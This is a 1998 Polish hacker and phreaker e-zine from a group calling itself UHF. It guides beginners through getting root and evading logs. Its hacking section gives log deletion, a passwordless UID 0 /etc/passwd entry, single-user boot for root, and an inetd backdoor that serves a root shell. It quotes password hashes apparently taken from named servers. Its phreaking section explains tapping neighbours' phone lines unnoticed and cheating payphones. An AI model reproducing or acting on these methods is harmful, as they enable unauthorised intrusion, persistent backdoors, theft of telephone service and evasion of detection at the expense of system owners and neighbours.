
         
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFFFFFFFFFFFF                       
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFFFFFFFFFFFF                         
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFF
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFF
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFF
                       UUUUU   UUUUU    HHHHHHHHHHHHH    FFFFFFFFFF
                       UUUUU   UUUUU    HHHHHHHHHHHHH    FFFFFFFFFF
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFF
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFF
                       UUUUU   UUUUU    HHHHH   HHHHH    FFFFF
                        UUUUUUUUUUU     HHHHH   HHHHH    FFFFF
                         UUUUUUUUU      HHHHH   HHHHH    FFFFF

                                 [U]nited [H]acking [F]ight
                                            
                                       v1.1 [31.03.98]
                <==========================================================>
                < ZIN  ten zostal  napisany  przez  czlonkow  grupy  [UHF] >
                < Materialy w nim zawarte sluza jedynie celom edukacyjnym. >
                < Grupa nie odpowiada za to , ze ktos  zrobi sobie krzywde >
                < po przeczytaniu tego  ZIN'a. [UHF] nie  bierze na siebie >
                < odpowiedzialnosci za jakiekolwiek straty.                >
                < ZIN'a mozna rozpowszechniac bez ograniczen, pod wrunkiem >
                < ze zostanie on bez zadnych zmian. Prosze uwazac komu sie >
                < go udostepnia.                                           >
                <==========================================================>


I Hacking
  
  1. Zasady..............................[Tytus] 
  2. Od czego zaczac ?...................[Winetou]
  3. Instalacja Linux'a..................[Winetou]
  4. Podstawy UNIX'a.....................[Tytus] 
  5. Poczatki............................[Winetou] 
  6. Najprostrzy backdoor................[Winetou]

II Phreaking

  1. Wstep...............................[Tytus]
  2. Jak postepowac ?....................[Tytus]
  3. "Pajeczarze"........................[Tytus]
  4. Budki telefoniczne..................[Tytus]
     a) na zetony........................[Tytus]
     b) na karty.........................[Tytus]+[Marsel]
  5. Box'y...............................[Tytus]
  6. Darmowy internet (0800-ki)..........[Tytus]



                                          I Hacking    
=================================================================================================

1. Zasady [Tytus]

  Po pierwsze  zanim zaczniesz wlamywac  sie (no moze za duzo powiedziane ;-) ) powinienes miec 
  juz  wlasne konto. To  z ktorego kozystasz  juz odpada. Powinienes  miec  zalozone w jednym z 
  darmowych shitow np. polbox, kki, onet itp. Hackowac  powinienes w  godzinach 11:00 - 14:00 , 
  wtedy jest najwiekszy tlok na sieci, a wiesz ile osob i firm w tym czasie kozysta z darmowych 
  kont? Kazde zalogowanie rejestrowane  jest w .logach systemowych ktore znajduja (najczesciej) 
  sie  w katalogu  /var na komputerze  glownym. Sa krotkie  (doslownie : maja po trzy  linijki) 
  programiki  usuwajace  jakiekolwiek  slady  bytnosci na  komputerze ;-)  . Mozesz  oczywiscie 
  hackowac kiedy chcesz, ale w razie gdyby Cie capneli to masz klopot, do  poludnia trudno jest 
  cokolwiek  znaledz w logach (sprobuj  przeszukac kilka  set tysiecy  linijek , aby znaledz ta 
  wlasciwa :). Zreszta logi to zaden dowod.
  Zelazne  zasady: nigdy nikomu  nie podawaj swojego numeru telefonu, imienia, nazwiska, adresu 
  !!! Najlepiej poslugiwac sie imionami kobiecymi, male  prawdopodobienstwo  wpadki. Nigdy  nie 
  uzywaj danych osoby ktora faktycznie istnieje, ZAWSZE ZMYSLAJ !!!

=================================================================================================

2. Od czego zaczac ? [Winetou]
 
  Przede wzsystkim musisz sie zdecydowac, czy chcesz zostac prawdziwym hackerem tzn. czy chcesz 
  sie w to bawic na dluzsza  mete, czy  tylko przeczytac jeden - dwoch poradnikow i dac sobie z 
  tym  spokoj. Cos  takiego wogole  nie ma  sensu. Musisz wiedzec, ze hackerstwo wcale nie jest 
  takie  latwe i bedzie  ci zabierac duzo czasu i  najprawdopodobniej caly czas przeznaczony na 
  Internet (chyba, ze interesuje  cie tez  phearking  i bedziesz mogl dzwonic za darmo). Jezeli 
  juz sie  zdecydowales to musisz  zdobyc "prawdziwy system operacyjny". Do takich na pewno nie 
  zalicza sie  shit  95  (Windows).  Takim systemem  jest UNIX. Ze  wzgledu na to, ze do UNIX'a 
  raczej malo ludzi ma dostep to proponuje Linux'a. Musisz wiedziec, ze w shicie95 nic zhaczysz 
  Poza tym, to raczej nie ma  (przynajmniej ja nie  widzialem) zadnego  exploita, ktorego mozna  
  sprawdzic na shitcie, a potem  zastosowac na UNIXie. Osobiscie jesli  chodzi o wybor  Linux'a 
  to proponuje  Red Hat'a 5.0 (na  dzien  dzisiejszy). Jest  to  najbardziej  popularny linux w 
  polsce i chyba  najlepszy. Jak  masz juz linux'a to musisz sie zatroszczyc o najnowsza wersje 
  Kernel'a  (jadro  linux'a).  Dlaczego ?  Otoz  co jakis  czas  wychodza  nowe kernele,  ktore 
  wprowadzaja  nowe  zabezpieczenia  anty-hackerskie. Otoz admini (chyba, ze masz do  czynienia 
  z skonczonym  lamerem) zazwyczaj  kompiluja  nowe jadra.  I  teraz  wyobraz  sobie  sytuacje. 
  Znalazles  gdzies  w  i-necie  jakis  nowy  exploit.  Masz  linux'a  wiec zanim sie polaczysz 
  oczywiscie  chcesz go sprawdzic  u siebie czy dziala. Kompilujesz, odpalasz - wszystko dziala 
  !!! Jestes caly happy, laczysz sie,  przegrywasz exploit na konto, kompilujesz, odpalasz, juz 
  ma ci wyskoczyc #bash, a tu nagle wyskakuje  ci cos w stylu Permission Denied. W tym momencie 
  dostajesz k**wicy. Teraz juz wiesz do czego  jest ci potrzebny nowy kernel. To samo tyczy sie 
  oczywiscie  samego  linux'a. Nie mysl, ze exploit,  ktory  chodzi  na  twoim  RedHacie  3.x z 
  najnowszym kernelem  bedzie  takze  chodzil na RedHacie 5.0 z tym samym kernelem. Dlatego tez 
  musisz dbac o aktualnosc  twojego  softwaru.  Teraz  na pewno sie zapytacie  skad wziasc tego 
  kernel'a. Otoz jest on zawsze dostepny na sunsite (adres  chyba  zna kazdy).  Mozna sobie tez 
  kupic najnowszego Linux'a Plus'a (20 zl/num). Daja oni do niego najnowsze kernele, linuxy itd 
  Aha jeszcze jedno dot. kernela i z tym koncze. Sa dwa  typy  kerneli: stabilne i nie stabilne 
  (tzn testowe). Te stabilne powinny ci chodzic bez zadnych problemow, a nie  stabilne moga sie 
  zawieszac. Jak rozpoznac czy kernel jest stabilny: wszystkie  stabilne kerne le maja pierwsza 
  cyfre po kropce parzysta np. 1.2; 1.0; 1.4. A nie stabilne maja nieparzysta np: 1.1; 2.1; 1.3 
  itd. Jesli  chcesz sie  dowiedziec  czegos  wiecej o kernelach i  linuxie to poczytaj polskie 
  HOW-TO (www.jtz.org.pl),albo angielskie (sunsite). Na www.jtz.org.pl znajdziecie wiele innych 
  dokumentow HOW-TO (po polsku),  takze  jesli nie znasz anglika  to: 1. Radze sie zaczac uczyc 
  (bez tego sobie za duzo nie pohaczysz).2. Tymczasowo czytac polskie dokumenty. No, ale koniec 
  z tym. Mialem pisac o poczatkach haczenia, a nie linux'a.

=================================================================================================

3. Instalacja Linux'a [Winetou]

  Widze, ze kilka osob ma problemy z instalacja linux'a wiec ja  opisze. Nie  bede  tu opisywal 
  wszystkich dystrybucji, tylko zajme sie ta najpopularniejsza -  RED  HAT  - v5.0 (HURRICANE).

  Zakladam , ze jeszcze nigdy nie instalowales linux'a i nie wiesz od czego zaczac. Otoz REDHAT 
  5.0 musi  miec swoja  wlasna  partycje . Przypuszczam , ze  nie zostawiles sobie nie zajetego 
  miejsca  przez  zadna  partycje na  HDD, wiec  masz dwa  wyjscia .  Pierwsze ( i  pewniejsze) 
  sformatowac  twardy  dysk  i  zostawic  przy  tworzeniu  nowej  partycji  okolo  300  MB  nie 
  wykorzystanego  miejsca. Drugie wyjscie jest lepsze, bo nie trzeba formatowac twardego dysku, 
  ale jest mozliwe, ze nie zadziala  ( dlaczego pozniej ). A wiec jesli wybrales drugie wyjscie 
  to musisz na poczatek  zdefragmentowac  twardziela .  Sluzy do  tego programik Defragmentator 
  dyskow , ktory jest  standartowo  w  Shitcie  95 .  Jak juz  zdefragmentujesz  twardziela  to 
  uruchamiasz  program FIPS.EXE. Ja instalowalem REDHAT'a z kompaktu CHIP'a 2/98 i FIPS.EXE byl 
  tam w katalogu  DOSUTILS.  Po uruchomieniu  FIPS'a (w DOSie) wybierasz dysk (partycje), ktora 
  chcesz podzielic. FIPS sprawdzi sobie kilka  rzeczy  i  pokaze  ci  dostepne wolne miejsce na 
  twardym. Za pomoca strzalek wybierasz ile miejsca  ma  miec  nowa  partycja  ( na ogol jakies 
  300-350MB). Utworzy on nowa partycje DOSowa. Nie formatuj jej bo nie jest to potrzebne. Teraz 
  uruchamiasz program RAWRITE.EXE (tez w DOSUTILS) .  Zapyta sie on  ciebie o plik z ktorego ma 
  byc utworzony obraz  dyskietki (w  przypadku CHIP'a  w katalogu  IMAGES\BOOT.IMG) . Nastepnie 
  wkladasz  czysta dyskietke .  Jak sie  zapyta o naped  podajesz mu go (najczesciej A:). Teraz 
  zostanie utworzony obraz dyskietki  startowej .  Nastepnie nie wyciagasz tej dyskietki, tylko 
  resetujesz  komputer  ( jesli  w  BIOSie  masz  ustawione , zeby najpierw szukal  systemu  na 
  twardzielu to musisz zmienic, zeby  najpierw  szukal  na dyskietce)  . Wyskoczy   ci  ekranik 
  powitalny. Jesli normalnie instalujsz linucha to dusisz ENTER. Teraz zostalna odczytane pliki 
  z dyskietki  i  pojawi  ci  sie  programik  instalacyjny . Najpierw zapyta  sie ciebie  o tak 
  podstawowe zeczy jak uklad klawiatury i skad  chcesz instalowac linuch'a (local CDROM). Teraz 
  poszuka plikow instalacyjnych na kompakcie . Jak je znajdzie  zapyta sie  ciebie  czy  chcesz 
  zainstalowac linucha czy zUPGRADowac  poprzednia wersje . Wybierasz  INSTALL . Dokladnie  nie 
  pamietam, ale teraz chyba przyjdzie  czas  na to co  sprawia  wszystkim  najwiecej  klopotu - 
  podzial partycji. Zakladam, ze utworzyles partycje dosowa  FIPSem .  Zapyta sie  ciebie , czy 
  chcesz uzywac FDISK'a czy DISKDRUIDA. Ja proponuje DISKDRUIDA, bo jest  latwiejszy ,  ale jak 
  chcesz to mozesz wziasc FDISK'a, ale ja tego nie opisze. Wiec jak wybierzesz  DISKDRUID'a  to 
  pojawi ci sie okienko z dyskami i  partycjami . Najezdzasz na  partycje , ktora  utworzyles w 
  FIPSie i DELETE. Teraz bedziesz mial  miejsce na dysku nie wykorzystane przez zadna partycje. 
  Wybierasz twardy dysk i musisz ADD.  mount point wpisujesz / potem wybierasz jaka duza ma byc 
  partycja, potem linux native , jaki dysk  i OK . Tu uwaga . Zostaw  troche wolnego miejsca na 
  swap'a. DISKDRUID nie pozwoli ci przejsc dalej jesli nie utworzysz partycji SWAP. Zaleznie od 
  tego  ile  masz  RAM'u  wybierasz  jaki  duzy  ma byc SWAP. Ja przy  16 MB RAM  mam SWAP'a 30 
  Megowego, natomiast moj kumpel z 24  RAMami ma  SWAPa 1 Megowego. Mi sie jednak wydaje, ze 30 
  MB to rozsadna liczba . Jak juz uporales  sie  z  partycjami  to  przychodzi  czas  na  wybor 
  pakietow. Jest tego troche do wyboru. Zaleznie jaka duz  a masz partycje  na LINUX'a na  tyle 
  mozesz sobie pozwolic. Aha przy wyborze pakietow wybierz dokladne wybieranie (nie calych grup 
  tylko kazdy pakiet po kolei). Musze dac wam jedna rade. Jesli chcesz moc  kompilowac programy 
  na swoim Linuchu to musisz zainstalowac biblioteki glibc.  Ja o  tym nie  wiedzialem  i przez 
  kilka  miesiecy sie z  tym  meczylem . Reszte  pozostawiam  waszemu wyborowi . Jak wybierzesz 
  pakiety  do instalacji to  zostana one  zainstalowane . Potem bedziesz  musial  skonfigurowac 
  XWindows  (odbywa sie  to  prawie  automatycznie ). Jesli jestes podpiety do jakiejs sieci to 
  musisz wybrac karte sieciowa i kilka innych gowien , ale nie powinnienes miec z tym problemu. 
  Jesli  masz  drukarke , to  mozesz  ja tez  zainstalowac .  Potem musisz podac  haslo  root'a 
  (administratora), ktorego bedziesz  uzywal przy  logowaniu  sie . Potem  przychodzi  czas  na 
  konfiguracje LILO (LinuxLoader). To tez jest  bardzo  latwe . Podejrzewam , ze  jako domyslna 
  partycje chcesz miec ta z shit'em 95, wiec najezdzasz na nia i dusisz F2. Jesli chcesz zmieni  
  c  jej  nazwe  to  dusisz  ENTER i wpisujesz jaka chcesz miec. Standardowo jest DOS , ale  ja 
  zmienilem sobie na SHIT95 . Druga tez mozesz sobie zmienic, ale LINUX to jest chyba najlepsza 
  nazwa. Potem nie pozostaje  ci nic jak zrestartowac kompa (uwaga nie rob tego sam instalka to 
  zrobi za ciebie). W LILO ustawiles, ze domyslna partycja jest SHIT wiec jesli chcesz wejsc do 
  linucha musisz napisac linux . Jesli  wolisz akorat  Shit'a  to mozesz poczekac albo walnac w 
  ENTER. Zapomnialem o jednej zaczy. Jak zostaniesz zapytany o to gdzie ma byc umieszczony LILO 
  to  koniecznie wybierasz pierwsza partycje swojego  pierwszego  dysku . AHA jeszcze gdzies po 
  drodze  bedziesz  pytany o to co ma byc uruchamiane przy starcie (sterowniki, SENDMAIL itd.). 
  Jak odpalisz linux'a i zanim sie  do  konca  uruchomi  wysnie  to  znaczy , ze  masz tak samo 
  pokopany komputer jak ja. Otoz  musisz zobaczyc  w czasie  uruchamiania  jakiego  pakietu sie 
  zawiesza. Potem dusisz CTRL+ALT+DEL  i  komputer sie  restartuje . Teraz jak wyskoczy ci lilo 
  boot: to nie wpisujesz linux, tylko linux single . Komputer sie  uruchami nie ladaujac czasci 
  pakietow i bez podawania hasla masz root'a  (jest  to tez sposob na wlam jesli siedzisz  przy 
  haczonym kompie) . Teraz wpisujesz  setup najezdzasz ( mniej wiecej srodek )  tam  gdzie  sie 
  wybiera pakiety  i  odznaczasz  pakiet  na  ktorym ci  sie  zawiesilo. Wychodzisz z setup'u i 
  CTR+ALT+DEL. Teraz znowu wpisujesz LINUX i  powinien  ci  sie  uruchomic. Jesli sie uruchomi, 
  ale wszystko bedzie chodzic bardzo  wolno ( np  MC sie uruchamia jakies dwie minuty) to wejdz 
  do  setup'u  i odznacz najpierw nameserver i zresetuj ,  a  jesli nadal nie bedzie dzialac to 
  odznacz network). Teraz powinno wszystko byc OK. W razie innych problemow pisz do UHF. 

=================================================================================================

4. Postawy UNIX'a [Tytus]

  UNIX to podstawa. Bez znajomosci tego systemu nie masz rozpoczynac nauki haczenia. Oto lista
  najbardziej potrzebnych komend uzywanych w systemie UNIX :

   cat - przegladanie pliku - cat /etc/passwd

   cd - zmienia biezacy katalog - cd /

   chmod - zmiana dostepu do pliku - chmod +r passwd

   cp - kopiuje plik - cp /etc/passwd /home/lamer

   find - szukanie pliku - find / -name passwd   

   finger - informacje o uzytkowniku - finger lamer
   
   kill - zabija procesy w pamieci kozystajac z numerow PID
   
   ls - listuje zawartosc katalogu - ls -al
   
   mkdir - tworzy katalog - mkdir katalog
   
   mv - przesuwa lub zmiena nazwe pliku - mv text1 text2
   
   passwd - zmienia haslo - passwd root
   
   pwd - podaje biezacy katalog

   rm - usuwa plik lub katalog - rm /var/log/lastlog

   rmdir - kasuje puste katalogi - rm /home/lamer
   
   vi - edytor pelnoekranowy

   who - podaje nazwe zalogowanego uzytkownika     

=================================================================================================

5. Poczatki [Winetou]

  Dobra.  Zalozmy,  ze masz  juz linux'a,  najnowsze  kernele itd,  ale co ci z tego przyjdzie. 
  Po  pierwsze jak  logujesz sie na  jakis server to  ze zwyklego  konta  (haczenie nie mialoby 
  sensu  jakbys  od razu  mial root'a).  Musisz na  swoim  linuxie stworzyc identyczna sytuacje 
  jaka  bedziesz mial na UNIXie, ktory chcesz chaczyc. Wiec  zakladasz  sobie  zwykle konto (ja 
  mam hack),  na ktorym  bedziesz przeprowadzal  testy. Od  teraz wszystkie  exploity testoj na 
  tym koncie. Po drugie musisz sie dowiedziec, czy server, ktory chcesz haczyc ma zainstalowane 
  shadow (teraz maja to prawie  wszystkie).  Jesli nie  wiesz co  to jest shadow  to znaczy, ze 
  jestes skonczonym lamerem,  ale mam pisac  o poczatkach wiec to  wytlumacze. Otoz  na  kazdym 
  UNIXie jest taki plik jak  /etc/passwd.  Sa w nim  przechowywane  informacje o uzytkownikach, 
  a  takze  ich  zakodowane  haslo  (lacznie z haslem root'a). Jedna linijka tego pliku wyglada 
  mniej wiecej tak:

  root:z5YAmW5ZwE7qQ:0:0:root:/root:/bin/bash

  Myslisz sobie ok, ale co to jest i do czego jest mi to potrzebne ?

  Otoz:
  root - to nazwa uzytkownika

  z5YAmW5ZwE7qQ - to zaszyfrowane haslo

  0:0 - oznacza grupe i uzytkownika do jakiej ten user nalezy

  :root: - informacja o uzytkowniku - w przypadku zwyklego user'a bedzie to  najczesciej imie i 
           nazwisko

  /root - katalog domowy

  /bin/bash - bash

  Powyzsza  linijka to linijka  root'a (z przed miesiaca server'a  www.radio.opole.pl, ale maja  
  zamkniety telnet)

  turnia:*ApNrL8kM7UEG.:514:100:Leszek Opalacz:/home/turnia:/bin/bash

  A oto linijka zwyklego user'a.

  Jaka widzicie roznice ? Otoz jest  ich kilka, ale nas  interesuje  jedna:  514:100 - u root'a 
  bylo 0:0 (grupa i user). Otoz kazdy user kto ma 0:0 jest root'em !!! Ale o  tym napisze kiedy 
  indziej. Teraz linijka z pliku /etc/passwd, na serverze, na ktorym jest zainstalowany  shadow  
  (/etc/shadow).

  root:x:0:1:Super-User:/:/sbin/sh

  Jaka  widzicie  roznice ???  Chodzi mi  teraz o  haslo. W miejsce  zaszyfrowanego  hasla jest 
  wpisane x (moze tez byc *).  Oznacza to, ze  zaszyfrowane  haslo  jest w pliku  (najczesciej)
  /etc/shadow. Roznica pomiedzy  tymi plikami jest taka, ze do /etc/passwd, kazdy moze zagladac 
  i przegrac sobie ten plik ftp, nie moze tylko go edytowac. Natomiast /etc/shadow moze ogladac 
  i edytowac tylko root. A oto jak wyglada plik shadow:

  piters:LMlGR0x3tVQ.o:10277::::::

  Widac tu tylko nazwe uzytkownika i zaszyfrowane haslo. (Jesli ktos chodzi do ZSO 4 w Poznaniu 
  to  niech sie  do mnie zglosi -  mam tam forte i root'a, takze jesli chodzi o konta to nie ma 
  problemu, ale tylko w  sieci lokalnej - na I-net  wychodza przez  modem). Tak wiec kazdy user 
  moze sobie sciagnac plik /etc/passwd, natomiast /etc/shadow ma tylko root. Jak wiec z poziomu 
  zwyklego  user'a zdobyc hasla na serverze z shadow ? Teoretycznie  jednyny  sposob to  zdobyc 
  root'a.  Mozna  to zrobic  na wiele  sposobow:  1. Sendmaile (miliardy  dziur),  2. exploity, 
  3. Dopisanie sobie linijki do /etc/passwd itd.

  Teraz  powiedzmy, ze  nie masz root'a,  ale masz mozliwosc edycji  /etc/passwd.  Co  robisz ? 
  Trzeba zdobyc tego root'a  wiec dopisujesz  sobie linijke  do /etc/passwd.  Pomyslisz co mi z 
  tego, ze  dopisze linijke  do  /etc/passwd, jak nie bede  mogl wpisac  hasla do /etc/shadow ? 
  Nic  bardziej  mylnego. Kto  powiedzial, ze kazde konto musi miec haslo ?? Wpisujesz w  /etc/
  passwd cos takiego:

  ktos::0:0:hacker:/root:/sbin/sh

  i teraz logujesz sie jako ktos (su ktos) i bez podawania hasla masz root'a :). W tym momencie 
  piszesz: passwd, zmieniasz haslo na jakiekolwiek i haslo to samo dopisuje sie do /etc/shadow!

=================================================================================================

6. Najprostrzy backdoor [Winetou]

  Jak  sie zabezpieczyc  przed  likwidacja  konta ?  Sa oczywiscie  jakies bardzo  zaawansowane 
  sposoby,  ale ja  zastawiam  zwykla furtke. Jak to  zrobic ? (Oczywiscie  musisz miec do tego 
  root'a). Ogladasz sobie  plik: /etc/services. Wypatrujesz tam  jakas egzotyczna nazwe uslugi. 
  Zapamietujesz ja i dopisujesz do /etc/inetd.conf

  tausluga stream tcp nowait root /bin/sh sh -i

  Teraz:telnet lamerski.server.pl tausluga

  Trying 123.456.78.9...
  Connected to comp.com
  Escape character is '^]'.
  bash#
  bash# whoami
  root
  bash#
  No i masz root'a bez logowania :)

------------------------------------------==[UHF]==----------------------------------------------


                                        II Phreaking     
=================================================================================================

1. Wstep [Tytus]

  Phreaking tak samo  jak hacking  jest trudna  sztuka (chyba mozna nazwac to sztuka, nie?). Do  
  obu tych profescji potrzebna jest ogromna wiedza  teoretyczna nie wspomne juz  o praktycznej.
  Hacker  do wlamania sie  na server  potrzebuje wiadomosci  na temat budowy  takiego servera a 
  phreaker  , zanim  dodzwoni sie  gdziekolwiek  za darmo  (!!!) musi  poznac  zasade dzialania
  centrali telefonicznych i samych telefonow.
  Do  phreakowania  potrzeba wiele  samozaparcia i duzo cierpliwosci.  Z rzeczy  "materialnych"
  potrzebne sa: telefon do podpinania sie (najlepiej sama sluchawka), Tone Dialer (Silver Box).
  Jesli  ktos chce  sie pobawic w  "malego elektronika"  (budowanie box'ow)  to musi miec spore
  pojecie na  temat elektroniki. To chyba tyle. Mysle , ze mozemy przejsc od slow do czynow ;-)

=================================================================================================
  
2. Jak postepowac ? [Tytus]

  Nie hacz telefonow z domu, grozi to nawet wiezieniem. Do sasiadow podpinaj sie w jak najmniej 
  widocznym miejscu np. przez  skrzynke w piwnicy. Do haczenia budek  telefonicznych niezbednym 
  narzedziem  jest  Tone Dialer . Jest  to male  urzadzonko  generujace tony takie  same jak  w 
  telefonie. Jest dosc male , ale  wielkie w  dzialaniu ;-) Przy nie ktorych sposobach na budki 
  trzeba uzyc sily fizycznej  , wiec wybieraj  budki zdala  od siedzib ludzkich. Najlepiej jest 
  probowac na aparatach umieszczonych gdzies na wsi , bo tam TPSA zbytnio nie dociera. 

=================================================================================================

3. "Pajeczarze" [Tytus]

  "Pajeczarze" to potocznie ludzie , podpinajacy sie do cudzej linii telefonicznej ,najczesciej
  do  linii najblizszego sasiada ;-) . W Polsce w ostatnim czasie jest wielka  nagonka na  tych
  ludzi. Jest kilka zasad ktorych przestrzeganie zapewni Ci dlugotrwale pracowanie na  rachunek
  Twojej ulubionej sasiadki :-) . Po pierwsze podpinaj sie w jak najmniej widocznych miejscach,
  najlepiej  w  skrzynkach w  piwnicy.  Nigdy nie  szalej z wysokoscia  rachunkow. Jesli  Twoje 
  dzialanie bedzie stanowic co  najwiecej 10% calego rachunku , to sasiad sie nie domysli i nie
  bedzie mial podstaw do reklamacji. Rowniez  wazne jest czy w  domu ofiary jest  ktos czy nie.
  Otoz podczas wybierania numeru przez Ciebie , slyszalne to bedzie w  telefonie  sasiada. Wiec
  zanim wybierzesz numer , sprawdz czy jest ktos w domu.
  Przejde do spraw konkretnych. Najczesciej chcialo by sie  pozbyc ze swoich rachunkow dlugich,
  przewaznie zagranicznych rozmow czy tez polaczen typu IDIOTELE. Najprosciej jest zadzwonic od 
  kogos, nie? Ale kto Ci da  zadzwonic ???  Najprosciej  jest  zadzwonic od tego kogos bez jego 
  wiedzy.  Potrzebny  nam bedzie  Tone Dialer i telefon do podpinania sie. Taki  telefon  mozna 
  zrobic w cigu 10 minut. Otoz: bierzesz sama sluchawke z ktorej wisi kabel , ktory laczy z nia  
  reszte telefonu. Do koncowki  kabla (sa dwie  zylki)  przeczepiasz  dwie  szpilki i  juz masz 
  gotowy aparat do phreak'owania.
  Teraz schodzisz do piwnicy (lub  innego ustronnego  miejsca) i wczepiasz  szpilki do  jednego 
  z kabli w skrzynce TPSA (uwazaj , abys nie podlaczyl sie do  wlasnego ;-).  Jesli sie  dobrze
  podlaczyles  to w  sluchawce  powinienes uslyszec: tiiiiiiiiiiiii .  Nastepnie przekladasz do 
  sluchawki Tone Dialera i wyciskasz jak chcesz numer i gadasz ile chcesz !!! Jesli ktos idzie,
  wyciagasz szpilki z  kabla i wzucasz  Twoj aparat np.  do torby  z ziemniakami i  udajesz ,ze
  wiazesz sznurowadlo :-) Jako ze izolacja kabla w skrzynce jest gumowa ,szpilki nie pozostawia
  jekiegokolwiek dowodu "pajeczarstwa". Slyszalem o  ludziach ktorzy  zdzierali  izolacje i zle 
  skonczyli. To chyba na tyle (na razie) o podpinaniu sie . Mysle ze wystarczy.   

=================================================================================================

4. Budki telefoniczne [Tytus]

  Budka telefoniczna jak wyglada chyba (!) kazdy wie? Ale nie jeden nie wie ze istnieja sposoby
  na dzwonienie z  nich za darmo.  Niektore  metody  wymagaja  od  phreakera znajomosci podstaw
  elektroniki a przy innych  wymagana jest  sila fizyczna.  Istniej  (jak narazie)  dwa  modele
  budek: zetonowce i na karty. Te pierwsze sa juz w zasadzie eliminowane z uzytku. Te na  karty
  magnetyczne tez beda niedlugo przestarzale , bo TPSA planuje wprowadzic do uzytku  aparaty na
  na karty chipowe, ale jeszcze do tego daleko i zajmijmy sie aktualnym stanem.

 a) Budki na zetony

  === [Tytus]
    Te starocie nie wymagaja duzego pomyslunku ,aby je zhaczyc. Przy pierwsze metodzie poprostu 
    trzeba mocno przywalic w otwor na zetony, poniewaz , gdy automat chce zetonu ,  otwiera sie 
    klapka  w  otworze wrzutowym  , a zeby mu sie odechcialo trzeba rabnac tak , aby sie klapka  
    zamknela. Ta metode radze wyprobowac gdzies na odludziu,bo mozecie wzbudzic zainteresowanie 
    przechodniow jak i mundurowych.

  === [Tytus]
    Inna metoda jest oszukanie  centrali Tone  Dialer'em.  Podchodzisz do zetonowca , podnosisz
    sluchawke i przykladasz do niej Tone Dialer'a i wystukujesz jaki chcesz numer. Jesli aparat
    jest odporny na ten bajer to sprawa zalatwiona - rachunek placi TPSA :-)

  === [Tytus]
    Zaliczac impulsy mozemy rowniez za pomoca sztuccow !Bierzemy lyzke lub widelec i wkladamy w
    otwor  gdzie wypadaja zetony. Kiedy maszyna zechce zetona krecimy wewnatrz lyzka tak  dlugo 
    az mu sie odechce. Powtarzamy czynnosc za kazdym impulsem.

 b) Budki na karty

  === [Tytus]
    Podnosimy  sluchawke w automacie  na karte, karty oczywiscie nie wkladamy. Wklepujemy  0800
    i czekamy. Slychac jekies trzaski i busy. Czekamy dalej. Po paru sekundach busy przyspiesza
    i nagle dialeton (jesli nie przyspieszy po 30 sekundach to budka nie dziala na ten sposob )
    I tu ograniczenie: mozesz bybrac tylko numer 6-cio cyfrowy, bo po 0800 tylko xxx xxx.

  === [Tytus]
    Jeszcze jeden trick na  automaty  na karty.  Dzwonimy na numer  974 i czekamy. Znowu jakies 
    trzaski i nic. Teraz naciskamy widelki i zaraz po tym mamy busy. Natychmiast  wciskamy 0800
    i mamy dialetone. Swiat u  naszych  stop..... ale  znowu do  wybrania  tylko 6 cyfr. Jednak
    jesli jest to  centrala Alcatel  (reaguje na  tony) mozemy  wybrac  jaki kolwiek numer Tone
    Dialer'em. Ale,  polaczenie zostaje zerwane przy najblizszym zaliczaniu impulsu. Szkoda :-(

  === [Marsel]
    Niektore budki (mysle o tych na karty oczywiscie)  pozwalaja  sie w prosty sposob oszukac:)
    Jezeli zauwazysz ze na twojej karcie koncza sie impulsy, a ty chcialbys jeszcze pogadac  to 
    nie panikuj:) W momencie kiedy na wyswietlaczu zacznie migac 0 (czyli  jedzieszna  ostatnim 
    kredycie),  wloz  druga , pusta karte :)  Dostaniesz  w nagrode obie karty z powrotem, oraz 
    bedziesz mogl  gadac do  woli...  Niestety  wiekszosc  automatow juz jest przed tym bajerem
    zabezpieczona:(( Ale sprobowac zawsze warto!!!:)

=================================================================================================

5. Box'y [Tytus]

  Box'y to male uzadzonka ktore umilaja zycie. Niestety zaden z tych box'ow nie ma zastosowania
  w Polsce, no moze za wyjatkiem Silver Box'a ktory  jest bardziej  znany jako Tone Dialer. Oto
  lista wszystkich znanych "skrzynek" wraz z opisem zastosowania:

  Box:		              		Opis:
 
  Red Box				generuje sygnal do bezplatnych polaczen telefonicznych

  Black Box				nazywamy goscia ktory nic nie placi

  Beige Box				monter ?

  Green Box				generuje sygnal zwracanej monety

  Cheese Box				przemienia twoj telefon w automat telef.

  Acrylic Box        			podlacza sie pod linie 3-zylowe i linie serwisowe ?
 
  Aqua Box				stopuje podsluch prowadzony przez F.B.I ?

  Blast Box				mikrofonowo-glosnikowy amplifikator
 
  Blotto Box				skraca wszystkie rozmowy na twoim terenie

  Blue Box				generuje dzwieki o czestotliwosci 2600 Hz

  Brown Box				tworzy zabawna linie

  Bud Box				podlsuch telefonu sasiadow
					
  Chatreuse Box				uzywa ukladu elektrycznego z telefonu ?

  Chrome Box				manipulacja w centrali telefonicznej

  Clera Box				bezplatne rozmowy

  Color Box				nagrywanie rozmowy telefonicznej

  Copper Box				powoduej nalozenie sie rozmow telefonicznych

  Crimson Box				przytrzymanie guzika

  Dark Box				re-roten calls

  Dayglo Box				podlaczenie sie do linii telefonicznej sasiadow

  DLOC Box				tworzy party line

  Gold Box				zrywa polaczenia

  Ininity Box				aktywuje odlegle telefony natarczywym dzwonieniem
 							
  Jack Box				touch-tone key pad

  Light Box				natrafienie na uzytkownika

  Lunch Box				transmisja AM

  Magenta Box				polaczenie odleglych telefonow w linie do innych
 
  Mauve Box				dzwonek telefonu bez mozliwosci uciecia

  Neon Box				zewnetrzny mikrofon

  Noise Box				tworzy linie dzwiekowa

  Olive Box				glos wydobywajacy sie z zewnetrznej sluchawki
 
  Party Box				stworzenie patry line

  Pearl Box				generator dzwiekow

  Pink Box				stworzenie party line

  Purple Box				przytrzyamanie przyscisku

  Rainbow Box				unieszkodliwienie sygnalu namierzajacego

  Rock Box				troche muzyki na linii telefonicznej

  Scarlet Box				nalozenie kilku rozmow

  Silver Box				kreuje dzwieki DTMF dla A,B,C i D

  Static Box				podwyzsza napiecie na zlaczach telefonicznych

  Switch Box				dodaje serwis

  Tan Box				nagrywanie rozmow telefonicznych

  TV Cable Box				zobaczenie fal dzwiekowych w telewizji

  Urine Box				generuje zaklocenia w sluchawce

